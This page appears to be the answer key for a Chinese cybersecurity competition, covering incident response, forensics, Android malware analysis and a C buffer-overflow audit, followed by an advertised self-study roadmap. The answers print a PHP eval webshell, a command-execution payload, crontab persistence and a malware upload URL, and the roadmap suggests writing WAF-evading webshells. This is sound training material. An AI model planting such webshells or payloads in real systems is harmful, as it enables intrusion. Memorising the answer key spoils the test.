网络安全事件响应、数字取证调查、应用程序安全 ** 参考答案**
第一部分 ****网络安全事件响应
任务1: ** CentOS** ** 服务器应急响应(70分)**
A集团的应用服务器被黑客入侵,该服务器的Web应用系统被上传恶意软件,系统文件被恶意软件破坏,您的团队需要帮助该公司追踪此网络攻击的来源,在服务器上进行全面的检查,包括日志信息、进程信息、系统文件、恶意文件等,从而分析黑客的攻击行为,发现系统中的漏洞,并对发现的漏洞进行修复。
本任务 ** 素材** ** 清单** ** :** ** CentOS服** **
务** ** 器虚** ** 拟** ** 机** ** 。**
受攻击的Server服务器已整体打包成虚拟机文件保存,请选手自行导入分析。用户名:root,密码:nanyidian…
注意:Server服务器的基本配置参见附录,若题目中未明确规定,请使用默认配置。
请按要求完成该部分的工作任务。
任务1: CentOS 服务器应急响应
序号
|
任务内容
|
答案
1
|
请提交网站管理员的用户名和密码
|
manager1/863211
2
|
攻击者通过应用后台修改了某文件获取了服务器权限,请提交该文件的文件名
|
footer.php
3
|
攻击者通过篡改文件后,可通过该网站官网进行任意未授权命令执行,请提交利用该木马执行phpinfo的payload,例如:/shell.php?cmd=phpinfo();
|
/?pass=phpinfo();
4
|
攻击者进一步留下的免杀的webshell在网站中,请提交该shell的原文最简式,例如: <?php ...?>
|
<?php eval($_POST['loveU']);?>5
|
攻击者修改了某文件,导致webshell删除后会自动生成,请提交该文件的绝对路径
|
/etc/crontab
6
|
请提交网站服务连接数据库使用的数据库账号和密码
|
wordpress/wordpress-pass
7
|
请提交攻击者在数据库中留下的信息,格式为:flag{…}
|
flag{th1s_ls_fl44444g1}
第二部分 数字取证调查
任务 ** 2** ** :基于Windows的内存取证(40分)**
A集团某服务器系统感染恶意程序,导致系统关键文件被破坏,请分析A集团提供的系统镜像和内存镜像,找到系统镜像中的恶意软件,分析恶意软件行为。
本任务 ** 素材** ** 清单** ** :内存镜像(.raw)。*
请按要求完成该部分的工作任务。
任务 2 :基于Windows的内存取证
序号
|
任务内容
|
答案
1
|
请指出内存中疑似恶意进程
|
.hack.ex
2
|
请指出该员工使用的公司OA平台的密码
|
liuling7541
3
|
黑客传入一个木马文件并做了权限维持,请问木马文件名是什么
|
h4ck3d!
4
|
请提交该计算机中记录的重要联系人的家庭住址
|
秋水省雁荡市碧波区千屿山庄1号
任务 ** 3** ** :通信数据分析取证(50分)**
A集团的网络安全监控系统发现恶意份子正在实施高级可持续攻击(APT),并抓取了部分可疑流量包。请您根据捕捉到的流量包,搜寻出网络攻击线索,分解出隐藏的恶意程序,并分析恶意程序的行为。
本任务 ** 素材** ** 清单** ** :捕获的通信数据文件。**
请按要求完成该部分的工作任务。
任务 3 :通信数据分析取证
序号
|
任务内容
|
答案
1
|
请提交网络数据包中传输的可执行的恶意程序文件名
|
happy.docx
2
|
请提交该恶意程序下载载荷的ip和端口
|
10.78.128.154:9090
3
|
请提交恶意程序载荷读取的本地文件名(含路径)
|
c:\tmp\secret.txt
4
|
请提交恶意程序读取的本地文件的内容
|
f6dff95c2ec911ebbede0cdd24f6bd6d
任务 ** 4** ** :基于Linux计算机单机取证(60分)**
对给定取证镜像文件进行分析,搜寻证据关键字(线索关键字为“evidence 1”、“evidence 2”、……、“evidence
10”,有文本形式也有图片形式,不区分大小写),请提取和固定比赛要求的标的证据文件,并按样例的格式要求填写相关信息,证据文件在总文件数中所占比例不低于15%。取证的信息可能隐藏在正常的、已删除的或受损的文件中,您可能需要运用编码转换技术、加解密技术、隐写技术、数据恢复技术,还需要熟悉常用的文件格式(如办公文档、压缩文档、图片等)。
本任务 ** 素材** ** 清单** ** :取证镜像文件。**
请按要求完成该部分的工作任务。
任务 4 :基于Linux计算机单机取证
证据编号
|
在取证镜像中的文件名
|
镜像中原文件Hash码(MD5,不区分大小写)
evidence 1
|
lili.gif
|
900EA4D6698613298AEDE3DF36BA92B8
evidence 2
|
qwe.dll
|
FB99F9C2C207281E0CD7A29E976F1CDD
evidence 3
|
dudu.xlsx
|
2437FD58491FBCA528B49B4AC7089425
evidence 4
|
vbdg.docx
|
6B8DFFA9586C6D99B559C79A2105D855
evidence 5
|
four_Digit.jpg
|
509998568BEAFA5D6C950493220F783D
evidence 6
|
jiko.py
|
68BB1999633DBB422C164AA4F664897B
evidence 7
|
INbud.bmp
|
9CEADE34EB17E135E24CB7937A600ADC
evidence 8
|
0N0n.jpg
|
45EB5309A774F1DB0B3B996584EB4326
evidence 9
|
buhu
|
900AA268F3BF119233CB2F05D5B8FAFD
evidence 10
|
yiji.doc
|
F70BBEC2D9AC8A4658D262D2695824EA
第三部分 应用程序安全
任务 ** 5** ** :Android恶意程序分析(50分)**
A集团发现其发布的Android移动应用程序文件遭到非法篡改,您的团队需要协助A集团对该恶意程序样本进行逆向分析、对其攻击/破坏的行为进行调查取证。
本任务 ** 素材** ** 清单** ** :Android移动应用程序文件。**
请按要求完成该部分的工作任务。
任务 5 :Android恶意程序分析
序号
|
任务内容
|
答案
1
|
提交素材中的恶意应用回传数据的url地址
|
http://wwww.somethingOrNothing.com/r/r/r/r
2
|
提交素材中的恶意代码保存数据文件名称(含路径)
|
/storage/emulated/0/Android/data/com.example.myapplication/files/.a/.a
3
|
提交素材中的恶意行为发起的dex的SHA1签名值
|
bb5adc13d8cedb7b34187d8293a92a5ee02996b0
4
|
描述素材中恶意代码的行为
|
读取并删除通讯录联系人数据,加密后写入本地文件,并上传到指定网址。
任务 ** 6** ** :** ** C** ** 代码审计(30分)**
代码审计是指对源代码进行检查,寻找代码存在的脆弱性,这是一项需要多方面技能的技术。作为一项软件安全检查工作,代码安全审查是非常重要的一部分,因为大部分代码从语法和语义上来说是正确的,但存在着可能被利用的安全漏洞,你必须依赖你的知识和经验来完成这项工作。
本任务 ** 素材** ** 清单** ** :C源代码文件。**
请按要求完成该部分的工作任务。
任务 6 :C代码审计
序号
|
任务内容
|
答案
1
|
请指出本段代码存在什么漏洞
|
缓冲区溢出
2
|
请指出存在漏洞的函数名称,例如:scanf
|
fgets
学习网络安全技术的方法无非三种:
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
第三种就是去找培训。
接下来,我会教你零基础入门快速入门上手网络安全。
网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说,学习编程或者计算机基础对他们来说都有一定的难度,并且花费时间太长。
第一阶段:基础准备 4周~6周
这个阶段是所有准备进入安全行业必学的部分,俗话说:基础不劳,地动山摇
第二阶段:web渗透
学习基础 时间:1周 ~ 2周:
① 了解基本概念:(SQL注入、XSS、上传、CSRF、一句话木马、等)为之后的WEB渗透测试打下基础。
② 查看一些论坛的一些Web渗透,学一学案例的思路,每一个站点都不一样,所以思路是主要的。
③ 学会提问的艺术,如果遇到不懂得要善于提问。
配置渗透环境 时间:3周 ~ 4周:
① 了解渗透测试常用的工具,例如(AWVS、SQLMAP、NMAP、BURP、中国菜刀等)。
② 下载这些工具无后门版本并且安装到计算机上。
③ 了解这些工具的使用场景,懂得基本的使用,推荐在Google上查找。
渗透实战操作 时间:约6周:
① 在网上搜索渗透实战案例,深入了解SQL注入、文件上传、解析漏洞等在实战中的使用。
② 自己搭建漏洞环境测试,推荐DWVA,SQLi-labs,Upload-labs,bWAPP。
③ 懂得渗透测试的阶段,每一个阶段需要做那些动作:例如PTES渗透测试执行标准。
④ 深入研究手工SQL注入,寻找绕过waf的方法,制作自己的脚本。
⑤ 研究文件上传的原理,如何进行截断、双重后缀欺骗(IIS、PHP)、解析漏洞利用(IIS、Nignix、Apache)等,参照:上传攻击框架。
⑥ 了解XSS形成原理和种类,在DWVA中进行实践,使用一个含有XSS漏洞的cms,安装安全狗等进行测试。
⑦ 了解一句话木马,并尝试编写过狗一句话。
⑧ 研究在Windows和Linux下的提升权限,Google关键词:提权
以上就是入门阶段
第三阶段:进阶
已经入门并且找到工作之后又该怎么进阶?详情看下图
给新手小白的入门建议:
新手入门学习最好还是从视频入手进行学习,视频的浅显易懂相比起晦涩的文字而言更容易吸收,这里我给大家准备了一套网络安全从入门到精通的视频学习资料包免费领取哦!
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
1925
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
